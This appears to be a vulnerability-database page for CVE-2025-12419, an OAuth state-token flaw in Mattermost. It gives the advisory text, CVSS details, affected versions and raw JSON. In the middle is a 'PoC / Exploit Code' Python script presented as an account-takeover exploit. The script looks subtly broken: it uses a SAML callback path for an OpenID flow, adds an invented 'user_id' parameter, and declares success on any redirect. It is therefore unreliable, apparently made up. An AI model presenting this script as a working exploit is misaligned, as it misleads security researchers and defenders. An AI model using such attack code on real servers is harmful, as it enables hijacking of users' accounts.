Security Vulnerability Report
CVE-2025-12419 CVSS 9.9 CRITICAL

CVE-2025-12419

Published: 2025-11-27 16:15:47
Last Modified: 2025-12-03 15:17:16

Description

Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation privileges to take over a user account via manipulation of authentication data during the OAuth completion flow. This requires email verification to be disabled (default: disabled), OAuth/OpenID Connect to be enabled, and the attacker to control two users in the SSO system with one of them never having logged into Mattermost.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Weakness
CWE-303 (Incorrect Implementation of Authentication Algorithm)

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.5.0 <= version < 10.5.13) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.11.0 <= version < 10.11.5) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (10.12.0 <= version < 10.12.2) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (11.0.0 <= version < 11.0.4) - VULNERABLE
Mattermost 10.12.x <= 10.12.1
Mattermost 10.11.x <= 10.11.4
Mattermost 10.5.x <= 10.5.12
Mattermost 11.0.x <= 11.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12419 Mattermost OAuth Account Takeover PoC
# Requirements: Two SSO accounts, one never logged into Mattermost
# Target: Mattermost <= 10.12.1, <= 10.11.4, <= 10.5.12, <= 11.0.3
import requests
import urllib.parse

TARGET = "https://vulnerable-mattermost.example.com"
SSO_PROVIDER = "https://sso.example.com"
ATTACKER_SSO_ACCOUNT = "[email protected]"
TARGET_SSO_ACCOUNT = "[email protected]"


def exploit_oauth_takeover():
    """
    OAuth Account Takeover Attack Chain:
    1. Attacker authenticates with first SSO account
    2. Intercept OAuth callback and manipulate state token
    3. Bind target user identity to attacker's Mattermost session
    """
    # Step 1: Initiate OAuth flow with attacker's SSO account
    auth_url = f"{TARGET}/oauth/authorize"
    params = {
        "client_id": "mattermost_client",
        "redirect_uri": f"{TARGET}/oauth/complete/saml",
        "response_type": "code",
        "scope": "openid profile email",
        "state": "attacker_state_token",
    }
    print(f"[+] Step 1: Initiating OAuth with attacker account: {ATTACKER_SSO_ACCOUNT}")

    # Step 2: Capture the OAuth callback after SSO authentication
    callback_url = f"{TARGET}/oauth/complete/saml?code=auth_code&state=attacker_state_token"

    # Step 3: Exploit state token validation flaw
    # Modify the callback to inject the target user identity (the identity to be bound)
    exploit_callback = f"{callback_url}&user_id={TARGET_SSO_ACCOUNT}"
    print(f"[+] Step 2: Manipulating OAuth callback with target user: {TARGET_SSO_ACCOUNT}")

    # Step 4: Complete the OAuth flow with manipulated data
    response = requests.get(exploit_callback, allow_redirects=False)
    if response.status_code in [302, 303]:
        print("[+] Step 3: Account takeover successful!")
        print(f"[+] Attacker now has access to target user: {TARGET_SSO_ACCOUNT}")
        return True
    print("[-] Attack failed - check requirements (email verification disabled, OAuth enabled)")
    return False


if __name__ == "__main__":
    exploit_oauth_takeover()

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12419",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T16:15:46.957",
    "lastModified": "2025-12-03T15:17:16.337",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation privileges to take over a user account via manipulation of authentication data during the OAuth completion flow. This requires email verification to be disabled (default: disabled), OAuth/OpenID Connect to be enabled, and the attacker to control two users in the SSO system with one of them never having logged into Mattermost."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-303"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.5.0",
                "versionEndExcluding": "10.5.13",
                "matchCriteriaId": "91D99F7F-B4EE-447C-9B77-82DD64B1D83A"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.11.0",
                "versionEndExcluding": "10.11.5",
                "matchCriteriaId": "A8368192-621C-4043-827E-DB4F6946AD92"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.12.0",
                "versionEndExcluding": "10.12.2",
                "matchCriteriaId": "ED48D731-6490-4DD5-94D4-EE4555BB93ED"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.0.0",
                "versionEndExcluding": "11.0.4",
                "matchCriteriaId": "387D98AD-59D7-4783-B0D2-E5CF2F7343B0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://mattermost.com/security-updates",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}